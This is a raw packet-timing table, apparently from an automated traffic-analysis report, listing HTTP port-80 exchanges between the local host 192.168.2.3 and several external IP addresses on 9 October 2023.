                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356153011 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356887102 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356930971 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356937885 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356950998 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356962919 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.356980085 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357011080 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357011080 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357778072 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357820988 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357824087 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357863903 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357904911 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357918978 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357944965 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.357974052 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358722925 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358772039 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358772993 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358786106 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358809948 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358815908 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358841896 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.358870029 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359669924 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359683037 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359697104 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359709978 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359711885 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359740973 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359761000 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.359761000 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360551119 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360567093 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360580921 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360594034 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360599041 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360629082 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360629082 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.360661983 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.423613071 CEST8049819202.254.236.40192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.423764944 CEST4981980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.452635050 CEST8049818211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.452786922 CEST8049818211.1.226.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.452847004 CEST4981880192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.465079069 CEST4981980192.168.2.3202.254.236.40
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.497838020 CEST4981880192.168.2.3211.1.226.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.521939039 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.521962881 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522106886 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522142887 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522202015 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522221088 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522250891 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522268057 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522303104 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522315979 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522342920 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522350073 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522361994 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522382021 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522396088 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522428989 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522494078 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522522926 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522547007 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522578955 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522583961 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522607088 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522664070 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522695065 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522708893 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522737026 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522751093 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522773027 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522784948 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.522804022 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.523603916 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.523617029 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.523628950 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.523641109 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.523657084 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.523664951 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525557041 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525604010 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525621891 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525650024 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525665045 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525697947 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525700092 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.525729895 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526032925 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526045084 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526062965 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526077986 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526103020 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526130915 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526143074 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.526159048 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527322054 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527363062 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527411938 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527441025 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527491093 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527522087 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527529955 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527556896 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527951002 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.527985096 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.528052092 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.528095961 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.528127909 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.528158903 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.528224945 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.528253078 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529122114 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529160976 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529226065 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529257059 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529284954 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529314995 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529321909 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.529359102 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530168056 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530210018 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530267000 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530299902 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530494928 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530530930 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530535936 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.530559063 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531677008 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531712055 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531723976 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531728029 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531747103 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531768084 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531791925 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.531817913 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532519102 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532557011 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532624960 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532655001 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532660007 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532682896 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532763004 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532802105 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532803059 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532835960 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532926083 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.532958031 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533014059 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533044100 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533047915 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533082008 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533530951 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533565044 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533588886 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533621073 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533633947 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533663034 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533709049 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.533747911 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534250975 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534281015 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534290075 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534308910 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534331083 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534362078 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534368038 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.534389973 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535222054 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535254955 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535293102 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535305977 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535330057 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535332918 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535352945 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.535371065 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536067963 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536103010 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536158085 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536185026 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536191940 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536216974 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536221981 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536252975 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536962032 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536998034 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.536998034 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.537026882 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.537079096 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.537107944 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.537122965 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.537151098 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.537992001 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538016081 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538029909 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538048983 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538070917 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538101912 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538105965 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538137913 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538141966 CEST804981681.2.194.241192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538809061 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538840055 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538868904 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538881063 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538897991 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538916111 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538922071 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.538954020 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.539791107 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.539803028 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.539823055 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.539839029 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540174961 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540210962 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540224075 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540235996 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540258884 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540266037 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.540292025 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541125059 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541136980 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541163921 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541171074 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541182995 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541201115 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541214943 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.541244984 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542013884 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542049885 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542062044 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542093992 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542097092 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542124987 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542162895 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542192936 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542937040 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542973995 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.542978048 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543003082 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543008089 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543036938 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543087006 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543117046 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543903112 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543915987 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543941975 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543960094 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.543998957 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544009924 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544028044 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544044971 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544759989 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544796944 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544800997 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544841051 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544852018 CEST8049805104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544882059 CEST4980580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:25.544904947 CEST8049805104.26.15.53192.168.2.3
